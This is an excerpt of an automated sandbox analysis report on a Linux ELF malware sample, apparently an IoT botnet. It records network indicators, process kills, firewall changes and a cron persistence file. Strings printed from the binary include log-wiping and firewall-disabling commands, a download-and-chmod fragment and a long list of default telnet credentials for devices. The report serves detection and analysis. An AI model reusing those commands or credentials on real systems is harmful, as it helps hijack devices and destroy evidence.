              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 51.254.162.59
              Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
              Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: unknownUDP traffic detected without corresponding DNS query: 134.195.4.2
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
              Source: global trafficDNS traffic detected: DNS query: octopus1337.geek
              Source: HNzkADzkE2.elfString found in binary or memory: http://Change_ip/octopus_re.sh;chmod

              System Summary

              barindex
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5545, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5546, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5591, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5588, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5596, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5595, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5644, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5638, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5642, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5669, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5690, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5643, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5687, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5692, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5721, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5691, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5707, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5752, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5818, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 797, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 802, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1444, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1475, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1480, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1482, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1588, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1604, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1748, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1751, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1755, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1765, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1804, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1832, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1866, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1872, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1875, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1879, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1881, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1884, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1891, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1906, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1921, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1922, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1925, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1930, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1940, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1944, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1946, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1969, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1982, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 2926, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 2972, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 2974, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3095, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3104, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3117, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3122, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3161, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3162, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3163, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3164, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3165, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3170, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3182, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3208, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3209, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3212, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3225, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3246, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3300, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3310, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3327, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3336, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3342, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3375, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3413, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3420, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3424, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3429, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3434, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3448, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3631, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 5449, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 5693, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 5742, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 5728, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 5749, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 5757, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 5758, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 5759, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 5820, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 5853, result: successfulJump to behavior
              Source: Initial sampleString containing 'busybox' found: pkill -9 busybox
              Source: Initial sampleString containing 'busybox' found: 'mipsrm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmprm -rf /tmp/*iptables -Fpkill -9 busyboxpkill -9 perlpkill -9 pythonservice iptables stop/sbin/iptables -F; /sbin/iptables -Xservice firewall stophistory -crm -rf ~/.bash_historyhistory -w0.0.0.0
              Source: Initial sampleString containing 'busybox' found: /bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
              Source: Initial sampleString containing 'busybox' found: busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
              Source: Initial sampleString containing 'busybox' found: /dev/watchdog/dev/misc/watchdogwatchdogrootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxpasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedbinvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetciscosetsockoptbindlisten1.1.1.1hi im here, i think/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPTbusybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPTbindtoipconnectpoll
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5545, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5546, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5591, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5588, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5596, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5595, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5644, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5638, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5642, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5669, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5690, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5643, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5687, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5692, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5721, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5691, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5707, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5752, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5508)SIGKILL sent: pid: 5818, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 797, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 802, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1444, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1475, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1480, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1482, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1588, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1604, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1748, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1751, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1755, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1765, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1804, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1832, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1866, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1872, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1875, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1879, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1881, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1884, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1891, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1906, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1921, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1922, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1925, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1930, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1940, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1944, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1946, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1969, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 1982, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 2926, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 2972, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 2974, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3095, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3104, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3117, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3122, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3161, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3162, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3163, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3164, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3165, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3170, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3182, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3208, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3209, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3212, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3225, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3246, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3300, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3310, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3327, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3336, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3342, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3375, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3413, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3420, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3424, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3429, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3434, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3448, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 3631, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 5449, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 5693, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 5742, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 5728, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 5749, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 5757, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 5758, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 5759, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 5820, result: successfulJump to behavior
              Source: /tmp/HNzkADzkE2.elf (PID: 5510)SIGKILL sent: pid: 5853, result: successfulJump to behavior
              Source: classification engineClassification label: mal100.spre.troj.evad.linELF@0/2@57/0

              Data Obfuscation

              barindex
              Source: /tmp/HNzkADzkE2.elf (PID: 5512)Written: /dev/ocmountJump to behavior

              Persistence and Installation Behavior

              barindex
              Source: /bin/sh (PID: 5842)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /bin/sh (PID: 5819)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /bin/fusermount (PID: 5641)File: /proc/5641/mountsJump to behavior
              Source: /bin/sh (PID: 5540)File: /etc/cron.d/mount.shJump to behavior
              Source: /usr/sbin/service (PID: 5476)Systemctl executable stopping iptables: /usr/sbin/systemctl -> systemctl stop iptables.serviceJump to behavior
              Source: /usr/sbin/service (PID: 5476)Systemctl executable stopping iptables: /usr/bin/systemctl -> systemctl stop iptables.serviceJump to behavior
              Source: /usr/bin/rm (PID: 5438)Directory: /var/lib/php/..Jump to behavior
              Source: /usr/bin/rm (PID: 5438)Directory: /var/lib/gdm3/.cacheJump to behavior
              Source: /usr/bin/rm (PID: 5438)Directory: /var/lib/gdm3/.cacheJump to behavior
              Source: /usr/bin/rm (PID: 5438)Directory: /var/lib/gdm3/.configJump to behavior
              Source: /usr/bin/rm (PID: 5438)Directory: /var/lib/gdm3/.configJump to behavior
              Source: /usr/bin/rm (PID: 5438)Directory: /var/lib/gdm3/.localJump to behavior
              Source: /usr/bin/rm (PID: 5438)Directory: /var/lib/gdm3/.localJump to behavior
              Source: /usr/bin/rm (PID: 5438)Directory: /var/lib/snapd/assertions/asserts-v0/..Jump to behavior
              Source: /usr/bin/rm (PID: 5438)Directory: /var/lib/snapd/assertions/..Jump to behavior
              Source: /usr/bin/rm (PID: 5438)Directory: /var/lib/snapd/..Jump to behavior
              Source: /usr/bin/rm (PID: 5438)Directory: /var/lib/colord/.cacheJump to behavior
              Source: /usr/bin/rm (PID: 5438)Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wantsJump to behavior
              Source: /usr/bin/rm (PID: 5438)Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wantsJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/230/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/230/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/110/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/110/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/231/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/231/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/111/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/111/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/232/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/232/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/112/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/112/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/233/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/233/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/113/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/113/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/234/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/234/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/114/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/114/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/235/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/235/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/115/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/115/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/236/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/236/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/116/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/116/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/237/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/237/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/117/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/117/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/238/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/238/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/118/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/118/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/239/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5460)File opened: /proc/239/cmdlineJump to behavior
